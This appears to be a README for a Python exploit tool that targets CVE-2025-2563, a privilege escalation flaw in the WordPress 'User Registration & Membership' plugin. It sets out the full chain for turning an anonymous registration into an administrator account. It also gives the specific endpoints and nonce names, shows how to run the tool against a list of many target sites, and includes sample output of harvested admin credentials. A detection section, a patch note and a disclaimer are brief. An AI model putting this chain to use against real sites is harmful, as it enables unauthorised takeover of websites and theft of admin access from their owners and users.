
CVE-2025-2563
██╗ ██╗███████╗███████╗██████╗ ██████╗ ███████╗ ██████╗ ██║ ██║██╔════╝██╔════╝██╔══██╗ ██╔══██╗██╔════╝██╔════╝ ██║ ██║███████╗█████╗ ██████╔╝ ██████╔╝█████╗ ██║ ███╗ ██║ ██║╚════██║██╔══╝ ██╔══██╗ ██╔══██╗██╔══╝ ██║ ██║ ╚██████╔╝███████║███████╗██║ ██║ ██║ ██║███████╗╚██████╔╝ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═════╝
CVE-2025-2563 — Unauthenticated Privilege Escalation via User Registration & Membership plugin for WordPress. Full-chain exploit: anonymous registration → membership nonce abuse → administrator role takeover.
| Field | Detail |
|---|---|
| CVE | CVE-2025-2563 |
| Plugin | User Registration & Membership |
| Affected Version | ≤ 4.1.1 |
| Type | Unauthenticated Privilege Escalation |
| CVSS | Critical |
| Vector | Network / No Auth Required |
| WordPress | Any version running the plugin |
[1] Crawl target
↓
[2] Fetch /membership-pricing/ & /membership-registration/
↓
[3] Extract form_id, membership_id, security nonce, ur_frontend_form_nonce
↓
[4] POST to /wp-admin/admin-ajax.php
action=user_registration_user_form_submit
→ Create arbitrary user account (unauthenticated)
↓
[5] Abuse membership JS nonce via ur_membership_frontend_localized_data
→ Assign administrator-level membership plan to new account
↓
[6] Verify admin access at /wp-admin/users.php & /wp-admin/plugin-install.php
↓
[7] Save credentials → NATA_admin.txt
form_id × membership_id × nonce combinationswp-admin access before marking as successNATA_admin.txt, registrations to reg.txtpip install requests rich
# 1. Add targets to list.txt (one URL per line)
# 2. Run
python CVE-2025-2563.py
Input: list.txt
https://target1.com
https://target2.com
https://target3.com
Output: NATA_admin.txt
[2025-04-20 08:00:00] https://target.com/wp-login.php user:natxploit_abc pass:NATA_adminSA
| File | Contents |
|---|---|
NATA_admin.txt | Confirmed admin credentials |
reg.txt | All successful registrations |
Monitor for:
/wp-admin/admin-ajax.php with action=user_registration_user_form_submit/membership-registration/ followed immediately by AJAX membership assignmentPatch: Update User Registration & Membership plugin to version >= 4.1.2
This tool is released for authorized penetration testing and security research only. The author holds no responsibility for misuse. Always obtain explicit written permission before testing.
Natan Utama — github.com/dokter69 | Telegram: @ayasyanaro